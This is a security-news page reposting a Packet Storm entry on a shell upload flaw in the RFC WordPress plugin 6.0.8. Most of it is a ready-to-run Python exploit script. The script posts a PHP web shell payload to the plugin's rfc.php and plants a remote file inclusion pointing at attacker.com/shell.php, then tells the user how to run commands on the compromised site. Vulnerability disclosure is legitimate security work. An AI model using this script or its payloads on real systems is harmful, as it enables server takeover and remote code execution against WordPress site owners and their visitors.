Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress RFC WordPress 6.0.8 Shell Upload

WordPress RFC WordPress plugin version 6.0.8 suffers from a remote shell upload vulnerability.

Packet Storm
#vulnerability#wordpress#php#rce
Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8 import requestsimport sys target = "https://target.com" # Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8#CODE BY E1.Coders  "The King of Security"def exploit_rfc_wordpress():    url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php"    payload = "<?php system($_GET['cmd']); ?>"       try:        response = requests.post(url, data={"rfc_action": "save_settings", "rfc_settings": payload})        if response.status_code == 200:            print("RCE exploit successful!")            print(f"Visit {url}?cmd=whoami to execute commands")        else:            print("RCE exploit failed.")    except requests.exceptions.RequestException as e:        print(f"Error: {e}") # Exploit for Remote File Inclusion (RFI) in RFC WordPressdef exploit_rfi_rfc_wordpress():    url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php?rfc_action=save_settings"    payload = "http://attacker.com/shell.php"       try:        response = requests.post(url, data={"rfc_settings": payload})        if response.status_code == 200:            print("RFI exploit successful!")            print(f"Visit {target}/wp-content/plugins/rfc-wordpress/shell.php to execute commands")        else:            print("RFI exploit failed.")    except requests.exceptions.RequestException as e:        print(f"Error: {e}") if __name__ == "__main__":    exploit_rfc_wordpress()    exploit_rfi_rfc_wordpress()

Packet Storm: Latest News

Red Hat Security Advisory 2024-8690-03